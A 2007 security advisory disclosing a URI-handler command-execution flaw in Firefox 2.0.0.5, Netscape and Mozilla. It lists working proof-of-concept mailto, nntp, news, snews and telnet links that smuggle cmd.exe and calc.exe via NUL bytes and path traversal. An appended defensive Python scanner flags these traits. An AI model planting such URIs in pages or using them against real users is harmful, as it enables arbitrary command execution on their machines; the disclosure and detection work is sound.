Securityvulns SECURITYVULNS:DOC:17607
Jul 25, 2007 - 12:00 a.m.

Remote Command Exec (FireFox 2.0.0.5 et al)

By: Nate McFeters (nate dot mcfeters -at- gmail)

Billy (BK) Rios (billy dot rios -at- gmail)

Tested in Firefox 2.0.0.5 (and 3.0a6), Netscape Navigator 9, and the Mozilla browser.

NOTE: These examples were created for WinXP SP2 with no external mail programs installed (Outlook, Notes, etc.). If you have an external mail program installed, these examples may not work on your machine (as the URI handling may have changed).

Once again, a flaw in the URI handling behavior allows for remote command execution. UNREGISTER ALL UNNECESSARY URIs NOW! This example shows flaws in Firefox, Netscape, and Mozilla browsers… other browsers are affected by related vulnerabilities.

Developers who intend to register (or have already registered) URIs for their applications MUST UNDERSTAND that registering a URI handler exponentially increases the attack surface for that application. Please review your registered URI handling mechanisms and audit the functionality called by those URIs…

These can be launched with no user warning (simply click on the link):

Mailto 0-day
mailto:%00%00…/…/…/…/…/…/windows/system32/cmd%22.exe%20…/…/…/…/…/…/…/…/windows/system32/calc.exe%20%22%20-%20%22%20blah.bat
nntp 0-day
nntp:%00%00…/…/…/…/…/…/windows/system32/cmd%22.exe%20…/…/…/…/…/…/…/…/windows/system32/calc.exe%20%22%20-%20%22%20blah.bat
news 0-day
news:%00%00…/…/…/…/…/…/windows/system32/cmd%22.exe%20…/…/…/…/…/…/…/…/windows/system32/calc.exe%20%22%20-%20%22%20blah.bat
snews 0-day
snews:%00%00…/…/…/…/…/…/windows/system32/cmd%22.exe%20…/…/…/…/…/…/…/…/windows/system32/calc.exe%20%22%20-%20%22%20blah.bat

The following require user interaction:

telnet 0-day
telnet:%00%00…/…/…/…/…/…/windows/system32/cmd%22.exe%20…/…/…/…/…/…/…/…/windows/system32/calc.exe%20%22%20-%20%22%20blah.bat
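
A defensive check built from the traits visible in the links above (percent-encoded NUL bytes, an encoded double quote, and .exe/.bat names inside URIs for externally handled schemes), as an added example that is not part of the original advisory. The function names, the extension list and the sample HTML are assumptions constructed for illustration.

```python
import html
import re
from urllib.parse import unquote

# Schemes named in the advisory; a browser hands each one to an external program.
EXTERNAL_SCHEMES = {"mailto", "nntp", "news", "snews", "telnet"}
# Extensions checked for; .exe and .bat appear in the links, .cmd is an assumption.
EXEC_EXT_RE = re.compile(r"\.(exe|bat|cmd)\b", re.IGNORECASE)
# Quoted href attribute values (simplified matcher, an assumption of this example).
HREF_RE = re.compile(r"""href\s*=\s*(["'])(.*?)\1""", re.IGNORECASE | re.DOTALL)

def uri_findings(uri):
    """Return the reasons a URI looks unsafe to pass to an external handler."""
    scheme, sep, rest = uri.strip().partition(":")
    if not sep or scheme.lower() not in EXTERNAL_SCHEMES:
        return []
    decoded = unquote(rest)  # undo one layer of percent-encoding
    findings = []
    # %0A, %0D and %09 are legitimate in mailto bodies, so they are not flagged.
    if any((ord(c) < 0x20 or ord(c) == 0x7F) and c not in "\t\r\n" for c in decoded):
        findings.append("control-character")      # e.g. %00
    if '"' in decoded:
        findings.append("double-quote")           # e.g. %22
    if EXEC_EXT_RE.search(decoded):
        findings.append("executable-extension")   # e.g. .exe, .bat
    return findings

def scan_html(document):
    """Return (uri, findings) for every flagged href in an HTML document."""
    hits = []
    for _quote, value in HREF_RE.findall(document):
        uri = html.unescape(value)  # resolve entities such as &#37; before checking
        findings = uri_findings(uri)
        if findings:
            hits.append((uri, findings))
    return hits

# Constructed sample page: only the second link carries the flagged traits.
SAMPLE = """
<a href="mailto:alice@example.com?body=line1%0Aline2">ok</a>
<a href="news:%00%00placeholder%22.exe%20argument.bat">flagged</a>
<a href="https://example.com/a%00b.exe">scheme not handed to an external handler</a>
<a href='TELNET:host.example.com'>ok</a>
"""

if __name__ == "__main__":
    for uri, findings in scan_html(SAMPLE):
        print(uri, "->", ", ".join(findings))
```

A quoted local part such as `%22name%22@example.org` is valid in a mailto URI, so treat the double-quote finding as a prompt for review rather than an automatic block.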